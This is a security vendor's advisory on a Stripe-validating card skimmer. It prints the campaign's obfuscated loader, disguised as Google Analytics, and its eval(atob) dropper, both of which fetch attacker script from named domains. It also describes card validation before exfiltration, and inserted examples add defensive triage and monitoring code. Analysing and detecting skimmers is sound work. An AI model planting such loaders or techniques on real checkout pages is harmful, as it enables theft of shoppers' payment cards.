by Source Defense

A newly discovered payment card skimming campaign has emerged exhibiting a concerning level of sophistication and leveraging unique tactics that make detection highly challenging. The attack, identified by Source Defense researchers, employs an innovative technique that exploits Stripe’s deprecated API to verify card details before exfiltration – ensuring that only valid payment information is harvested while maintaining a seamless customer experience that evades detection.

Attack Overview: A Multi-Stage Compromise

The attack chain begins with a compromised first-party script that loads its payload from two known malicious domains masquerading as legitimate resources:

  • jqbs-get[.]store
  • bsjq-online[.]store

These domains serve as the initial distribution points for the skimming payload, which specifically targets checkout pages by inspecting the page URL for a checkout path marker.

Novel Features of the Campaign

What sets this attack apart is its selective validation process. Rather than blindly collecting all payment data, the attackers have implemented a verification system that:

  1. Intercepts legitimate payment form submissions
  2. Creates a perfect visual replica of the legitimate Stripe payment elements (i.e. it mimics the payment forms in the iFrame)
  3. Validates captured card data through Stripe’s API before exfiltration
  4. Maintains the original purchase flow to avoid detection

“This attack represents a concerning evolution in payment skimming techniques,” notes Source Defense’s research team. “By validating cards before exfiltration and ensuring the legitimate purchase completes, the attackers have created a nearly invisible theft mechanism.”

Technical Deep Dive: The Attack Mechanics

The campaign operates through a sophisticated three-stage process:

Stage 1: Initial Compromise

The attack begins with the compromised first-party script checking whether the current page is a checkout page; the check looks for a base64-encoded path marker in the URL and is adapted to the locale of the website.

JavaScript

// Loader disguised as the Google Analytics bootstrap snippet.
// r decodes to "checkout"; o decodes to the linkid.js URL on jqbs-get.store listed below.
(function (i, s, o, g, r, a, m) {
  i["Google" + "Analytics" + "Objects"] = r;
  (a = s.createElement(g)), (m = s.getElementsByTagName(g)[0]);
  // Only fire on URLs that contain the decoded marker ("checkout").
  if (i.location["href"].indexOf(i.atob(r)) > 0) {
    a.async = 1;
    a.src = "" + i.atob(o); // attacker-controlled script URL, base64-hidden
    m.parentNode["insert" + "Before"](a, m);
    r = 1;
  }
})(
  window,
  document,
  "Ly9qcWJzLWdldC5zdG9yZS93d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20vcGx1Z2lucy91YS9saW5raWQuanM=",
  "script",
  "Y" + "2" + "h" + "l" + "Y" + "2" + "t" + "v" + "d" + "X" + "Q" + "=",
  "//www.google-analytics.com/analytics.js",
  "ga"
);

Once a checkout page is found, the loader requests one of these malicious URLs:

  • https://jqbs-get[.]store/www.google-analytics.com/plugins/ua/linkid.js
  • https://bsjq-online[.]store/www.google-analytics.com/plugins/ua/linkid.js

This request returns base64-encoded JavaScript that, once decoded and evaluated, loads the script holding the actual attack code from one of these URLs:

  • https://jqbs-get[.]store/cdn/jquery-update.min.js?v=3.0.12
  • https://bsjq-online[.]store/cdn/jquery-update.min.js?v=3.0.12

JavaScript

// Decodes to a one-liner that appends a <script> for jquery-update.min.js from jqbs-get.store to <head>.
eval(atob("dmFyIGpxVVAgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtqcVVQLnNyYz0naHR0cHM6Ly9qcWJzLWdldC5zdG9yZS9jZG4vanF1ZXJ5LXVwZGF0ZS5taW4uanM/dj0zLjAuMTInO2RvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoJ2hlYWQnKS5hcHBlbmRDaGlsZChqcVVQKQ=="));
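The loader and dropper above hide their real targets behind base64 and string concatenation. As an added example (not Source Defense's own code), the Node.js triage below folds "Y"+"2"+... chains, decodes base64-looking literals and reports any decoded host outside an allowlist, plus the eval(atob(...)) dropper pattern; ALLOWED_HOSTS and the sample snippets are assumptions constructed for the demo.

```javascript
// Added example, not from the Source Defense write-up: offline triage of an inline script
// that dresses itself up as the Google Analytics snippet, as the Stage 1 loader does.
// ALLOWED_HOSTS is an assumption; a merchant would list its own analytics/PSP hosts here.
const ALLOWED_HOSTS = new Set(["www.google-analytics.com", "js.stripe.com"]);

// Constructed samples: a condensed copy of the loader above, the dropper it fetches
// (blob as published above) and the genuine analytics snippet as a benign control.
const LOADER = `(function(i,s,o,g,r,a,m){i["Google"+"Analytics"+"Objects"]=r;a=s.createElement(g);
m=s.getElementsByTagName(g)[0];if(i.location["href"].indexOf(i.atob(r))>0){a.async=1;a.src=""+i.atob(o);
m.parentNode["insert"+"Before"](a,m);}})(window,document,
"Ly9qcWJzLWdldC5zdG9yZS93d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20vcGx1Z2lucy91YS9saW5raWQuanM=","script",
"Y"+"2"+"h"+"l"+"Y"+"2"+"t"+"v"+"d"+"X"+"Q"+"=","//www.google-analytics.com/analytics.js","ga");`;
const DROPPER = `eval(atob("dmFyIGpxVVAgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtqcVVQLnNyYz0naHR0cHM6Ly9qcWJzLWdldC5zdG9yZS9jZG4vanF1ZXJ5LXVwZGF0ZS5taW4uanM/dj0zLjAuMTInO2RvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoJ2hlYWQnKS5hcHBlbmRDaGlsZChqcVVQKQ=="));`;
const BENIGN_GA = `(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;a=s.createElement(o);a.async=1;a.src=g;
m=s.getElementsByTagName(o)[0];m.parentNode.insertBefore(a,m)})(window,document,'script','//www.google-analytics.com/analytics.js','ga');`;

// "Y"+"2"+"h"... hides a literal from a plain grep; fold such chains before decoding.
function foldConcatenations(src) {
  return src.replace(/"([^"]*)"(?:\s*\+\s*"([^"]*)")+/g, (chain) =>
    '"' + chain.match(/"([^"]*)"/g).map((s) => s.slice(1, -1)).join("") + '"');
}

// Decode every quoted literal that looks like base64; keep only printable results,
// so identifiers such as "GoogleAnalyticsObject" (garbage when decoded) are dropped.
function decodeBase64Literals(src) {
  const out = [];
  for (const m of src.matchAll(/(["'])([A-Za-z0-9+/]{8,}={0,2})\1/g)) {
    const text = Buffer.from(m[2], "base64").toString("utf8");
    if (/^[\x20-\x7e]+$/.test(text)) out.push(text);
  }
  return out;
}

// Pull the host out of an absolute or protocol-relative URL embedded in decoded text.
function hostOf(text) {
  const m = text.match(/(?:https?:)?\/\/([^\/'";\s]+)/);
  return m ? m[1].toLowerCase() : null;
}

function triageScript(src) {
  const folded = foldConcatenations(src);
  const findings = [];
  if (/eval\s*\(\s*atob\s*\(/.test(folded)) findings.push("eval(atob(...)) dropper pattern");
  for (const text of decodeBase64Literals(folded)) {
    const host = hostOf(text);
    if (host === null) findings.push(`decoded literal: ${JSON.stringify(text)}`);
    else if (!ALLOWED_HOSTS.has(host)) findings.push(`decoded literal loads from unlisted host ${host}`);
  }
  return findings;
}
```

Run against the three samples, the benign snippet yields no findings while both the loader and the dropper surface jqbs-get.store, and the loader additionally reveals its decoded "checkout" trigger.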

Stage 2: Form Manipulation

Once triggered, the malware:

  • Removes the legitimate Stripe payment elements
  • Injects visually identical but attacker-controlled payment elements in their place
  • Captures payment details through the fraudulent elements

[Screenshot: original Stripe payment elements]

[Screenshot: fake payment elements]

Stage 3: Card Validation and Exfiltration

The most innovative aspect of this campaign is its use of Stripe’s API for validation:

  1. Captured card details are first sent to api.stripe.com/v1/sources
  2. Only validated cards are exfiltrated to isjustour[.]site, a domain not yet identified as malicious by leading blacklist providers
  3. The malicious code then clicks the submit button, this time without triggering the Stripe validation again, so the purchase flow continues and neither the user nor Stripe sees anything suspicious:

JavaScript

document.querySelector('button[name="woocommerce_checkout_place_order"]').click();

Implications for E-commerce Security

This attack demonstrates several concerning trends in the evolution of payment card skimming:

  1. Sophisticated Validation: By leveraging legitimate payment APIs, attackers ensure only valid cards are stolen.
  2. Seamless Operation: Unlike the classic fake-form attack that requires double entry by the customer, this attack maintains the normal purchase flow, making detection extremely difficult. Furthermore, even security researchers will have a hard time finding this attack, because the malicious code does not exfiltrate anything when fake payment details are entered.
  3. Dynamic Payload Delivery: The malicious script adjusts its behavior depending on whether Stripe or another payment processor is used. If Stripe is detected, it utilizes Stripe’s API for validation. Otherwise, it may fall back to other methods, such as regex-based card number validation.

Recommendations for Protection

Organizations operating e-commerce platforms should:

  1. Implement robust client-side security controls to prevent unauthorized script execution
  2. Monitor and validate all third-party script behavior across the entire website
  3. Deploy real-time behavioral analysis to detect form manipulation attempts
  4. Consider implementing additional validation steps for payment API access
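Recommendations 2 and 3 above can be made concrete on the checkout page itself. As an added example (not Source Defense's product code), the monitor below flags the Stage 2 swap (the PSP's hosted iframe removed and a raw card-number input inserted in the same mutation batch) and the Stage 3 exfiltration (a request to a host outside the PSP allowlist); PSP_HOSTS, FIRST_PARTY, the selectors and the report sink are assumptions to tune per site.

```javascript
// Added example, not from the Source Defense write-up: a checkout-page monitor for the
// two behaviours described above. The pure helpers run under Node for testing; the
// browser wiring at the bottom is only installed when a window exists.
const PSP_HOSTS = new Set(["js.stripe.com", "api.stripe.com", "m.stripe.com"]); // assumed PSP hosts
const FIRST_PARTY = "shop.example"; // assumed merchant host

// Network side: during checkout only the merchant and its PSP should receive requests.
function classifyRequest(url, pageHost = FIRST_PARTY) {
  let host;
  try { host = new URL(url, `https://${pageHost}`).hostname; } catch { return "invalid"; }
  return host === pageHost || PSP_HOSTS.has(host) ? "allowed" : "unexpected";
}

// DOM side: reduce an added/removed element (and the subtree it carries, since the
// skimmer may swap a whole container) to two facts. With hosted fields the merchant
// page never contains a raw PAN input itself; only the PSP iframe does.
function describe(el) {
  const has = (sel) => el.matches(sel) || el.querySelector(sel) !== null;
  return {
    hasPspIframe: has('iframe[src^="https://js.stripe.com/"]'),
    hasRawCardInput: has('input[autocomplete="cc-number"], input[name*="cardnumber"]'),
  };
}

// Assess one observer batch; a synchronous remove-and-replace lands in the same batch.
// Iframe removal alone also happens on legitimate re-renders, so it gets its own verdict.
function assessMutation(removed, added) {
  const lostPsp = removed.some((d) => d.hasPspIframe);
  const gainedRaw = added.some((d) => d.hasRawCardInput);
  if (lostPsp && gainedRaw) return "psp-iframe-replaced-by-raw-card-input";
  if (gainedRaw) return "raw-card-input-injected";
  if (lostPsp) return "psp-iframe-removed";
  return "benign";
}

// Browser wiring; returns false under Node. Only fetch() is hooked here; XMLHttpRequest
// and navigator.sendBeacon would need the same treatment in a real deployment.
function installMonitor(report = console.warn) {
  if (typeof window === "undefined") return false;
  const origFetch = window.fetch.bind(window);
  window.fetch = (input, init) => {
    const url = input instanceof Request ? input.url : String(input);
    if (classifyRequest(url, location.hostname) !== "allowed") report("unexpected request", url);
    return origFetch(input, init);
  };
  const elems = (list) => [...list].filter((n) => n.nodeType === 1).map(describe);
  new MutationObserver((records) => {
    const verdict = assessMutation(records.flatMap((r) => elems(r.removedNodes)),
                                   records.flatMap((r) => elems(r.addedNodes)));
    if (verdict !== "benign") report(verdict, records[0].target);
  }).observe(document.body, { childList: true, subtree: true });
  return true;
}
```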

As we approach the March 2025 deadline for PCI DSS 4.0 compliance, particularly requirements 6.4.3 and 11.6.1, this attack serves as a stark reminder of why client-side security controls are now mandatory. It also dispels a false sense of security that many hold: that simply embedding a PSP iFrame somehow defeats adversarial tradecraft.

The sophistication of this campaign – leveraging APIs and maintaining seamless customer experiences – demonstrates that traditional security measures are no longer sufficient to protect against modern payment card theft techniques.

Organizations must take proactive steps to secure their client-side environment and protect customer payment data from increasingly sophisticated threats. This includes implementing robust script monitoring and control mechanisms that can detect and prevent unauthorized form manipulation and script injection attempts in real-time.

For more information about protecting your organization against sophisticated client-side attacks, contact Source Defense for a comprehensive security assessment.
